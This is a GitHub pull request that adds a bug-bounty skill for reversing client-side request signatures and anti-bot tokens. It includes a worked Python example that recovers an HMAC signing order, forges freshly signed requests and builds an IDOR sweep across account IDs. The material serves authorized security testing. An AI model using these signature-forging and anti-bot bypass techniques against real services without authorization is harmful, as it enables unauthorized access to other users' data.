
feat(skills): add client-reverse skill (request-signing / anti-bot token reversal)#63

Open · letztek wants to merge 1 commit into shuvonsec:main from letztek:feat/client-reverse-skill

Conversation

letztek (Contributor) commented Jun 10, 2026

What

Adds a new focused skill skills/client-reverse/SKILL.md (plus one reference doc references/browser-js-signing.md) covering client-side request-signing and anti-bot token reversal for bug bounty — the case where a sign/sig/X-Signature/nonce/X-Sensor-Data/encrypted-body field stops you from replaying a request in Burp/mitmproxy.

Core methodology is packet-first staging: capture the real request → prove replay works unchanged → only reverse the signer if replay actually fails. Walks the locate → recover → runtime → validation → replay spine, teaching:

  • tracing backward from the signature field (writer ← builder ← entry ← source)
  • isolating which sign inputs are user-mutable (timestamp/nonce/deviceId/body) vs constant (secret key) — the decision that determines whether replay is even possible
  • hooking fetch/XHR and the signer in Chrome DevTools (XHR/fetch breakpoints, console method override, {} pretty-print + global search)
  • deobfuscation basics (webpack/wasm/JSVMP) with a strong bias toward the black-box "reuse the page's signer / log sign(input)→output" shortcut over decompiling crypto
  • anti-bot tokens (Akamai/DataDome/PerimeterX) via token reuse / headless bridge, with the explicit note that full SDK reversal is out of scope for a single bounty
  • a Python replay+fuzz template that pivots straight into an IDOR sweep

Uses standard CLI tooling only (Chrome DevTools, Burp, mitmproxy, Python requests, Selenium/Playwright, and apktool/jadx/objection/frida CLI for the mobile variant) — no new MCP dependency.

Why

Nothing in the current skill set covers reaching an API that's gated by a client-computed signature, despite this being a common wall on high-value targets. The bounty framing is explicit throughout — the signing weakness alone is N/A; the payoff is the IDOR / Broken Auth / Mass Assignment / Business Logic bug you reach through it, cross-referenced to web2-vuln-classes and web2-recon. Includes a "what's submittable vs N/A" verdict table to keep hunters from reporting "I reversed your algorithm" as a finding.

References

Grounded against current web research, with only verifiable disclosures cited:

  • the CoinMate HackerOne disclosure (HMAC signature omits endpoint/payload → request forgery)
  • HMAC-header replay-window patterns
  • Akamai v3 sensor-data internals
  • the PerimeterX iOS SDK reversal write-up

No dollar figures or CVEs were invented — only verifiable disclosures are cited, and patterns without a confirmed payout are labeled as patterns.

Merge order

Net-new skill directory; does not modify web2-vuln-classes or any existing file. Adds a row to the CLAUDE.md skills table. No conflicts expected.
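An added worked example of the recover → validation → replay spine the description outlines, written for this page and not taken from the PR, the skill, or VulnClaw. It takes the white-box branch (the signer's key has already been pulled from the bundle) rather than the black-box "reuse the page's signer" shortcut the skill prefers. Everything in it is an assumption: the HMAC-SHA256 signer, the header names (X-Timestamp, X-Nonce, X-Signature), the candidate canonicalization orders, the constructed capture, and the hypothetical recovered key. It shows the three steps a hunter actually performs against a captured request: test candidate canonical strings against the captured signature to learn which inputs the signer covers, re-sign with a fresh timestamp and nonce and a mutated body, and turn that into a batch of correctly signed requests for an IDOR sweep.

```python
import hashlib
import hmac
import json
import secrets
import time

# Constructed sample capture (not a real target): the request whose Burp replay
# fails once X-Timestamp falls outside the server's acceptance window.
CAPTURED = {
    "method": "POST",
    "path": "/api/v2/statements/export",
    "headers": {"X-Timestamp": "1760000000", "X-Nonce": "3f9a1c2e7b8d4a60"},
    "body": {"accountId": 1042, "format": "csv"},
}

# Hypothetical secret, assumed to have been recovered from the JS bundle.
RECOVERED_KEY = b"k3y-from-webpack-chunk-0x42"

# Candidate canonical strings, cheapest guess first. Every listed field is
# attacker-controlled (timestamp, nonce, path, body); the only constant is the key.
CANDIDATES = {
    "ts": ("ts",),
    "ts+nonce": ("ts", "nonce"),
    "ts+nonce+body": ("ts", "nonce", "body"),
    "method+path+ts+nonce+body": ("method", "path", "ts", "nonce", "body"),
}


def compact_json(obj):
    # Mirror JSON.stringify: no whitespace, keys in insertion order.
    return json.dumps(obj, separators=(",", ":"))


def sign_inputs(req):
    """Every value a client-side signer could plausibly feed into the MAC."""
    return {
        "ts": req["headers"]["X-Timestamp"],
        "nonce": req["headers"]["X-Nonce"],
        "method": req["method"],
        "path": req["path"],
        "body": compact_json(req["body"]),
    }


def canonical(inputs, order, sep="\n"):
    return sep.join(inputs[k] for k in order)


def hmac_sha256_hex(key, message):
    return hmac.new(key, message.encode(), hashlib.sha256).hexdigest()


# In a real engagement this literal is the X-Signature header from the capture;
# it is computed here only so the example runs offline.
CAPTURED_SIG = hmac_sha256_hex(
    RECOVERED_KEY,
    canonical(sign_inputs(CAPTURED), CANDIDATES["method+path+ts+nonce+body"]),
)


def recover_canonicalization(req, key, captured_sig):
    """Validation step: which candidate input order reproduces the captured sig?"""
    inputs = sign_inputs(req)
    for name, order in CANDIDATES.items():
        guess = hmac_sha256_hex(key, canonical(inputs, order))
        if hmac.compare_digest(guess, captured_sig):
            return name
    return None  # wrong key, wrong separator, or a field we did not list


def resign(req, key, order, **body_overrides):
    """Fresh timestamp and nonce, mutated body, recomputed MAC."""
    new = {
        "method": req["method"],
        "path": req["path"],
        "headers": dict(req["headers"]),
        "body": {**req["body"], **body_overrides},
    }
    new["headers"]["X-Timestamp"] = str(int(time.time()))
    new["headers"]["X-Nonce"] = secrets.token_hex(8)
    new["headers"]["X-Signature"] = hmac_sha256_hex(
        key, canonical(sign_inputs(new), order)
    )
    return new


def idor_sweep(req, key, order, account_ids):
    """One correctly signed request per candidate ID, ready for requests.Session()."""
    return [resign(req, key, order, accountId=aid) for aid in account_ids]


def server_would_accept(req, key, order):
    """Stand-in for the server's verifier: same MAC over the same canonical string."""
    expected = hmac_sha256_hex(key, canonical(sign_inputs(req), order))
    return hmac.compare_digest(expected, req["headers"]["X-Signature"])


if __name__ == "__main__":
    name = recover_canonicalization(CAPTURED, RECOVERED_KEY, CAPTURED_SIG)
    print("signer canonicalization:", name)
    for r in idor_sweep(CAPTURED, RECOVERED_KEY, CANDIDATES[name], [1041, 1042, 1043]):
        ok = server_would_accept(r, RECOVERED_KEY, CANDIDATES[name])
        print(r["body"]["accountId"], r["headers"]["X-Signature"][:16], ok)
```

The candidate list is the part that varies per target: if no entry matches, the usual culprits are a different separator, a sorted rather than insertion-ordered JSON body, or a field (user agent, device ID, page token) the signer covers that is not in the list. If the key cannot be recovered at all, the same resign step is done by calling the page's own signer through Playwright or Selenium and reading back the output, which is the shortcut the skill favours.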

…ken reversal)

Ports VulnClaw's client-reverse skill into a bug-bounty-framed skill: packet-first replay gate, locate->recover->runtime->validation->replay staging, sign-input isolation, fetch/XHR hooking, JS deobfuscation, and reaching protected APIs to hunt IDOR/auth/business-logic.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
letztek force-pushed the feat/client-reverse-skill branch from 908c417 to d0eb4bb on June 10, 2026 13:44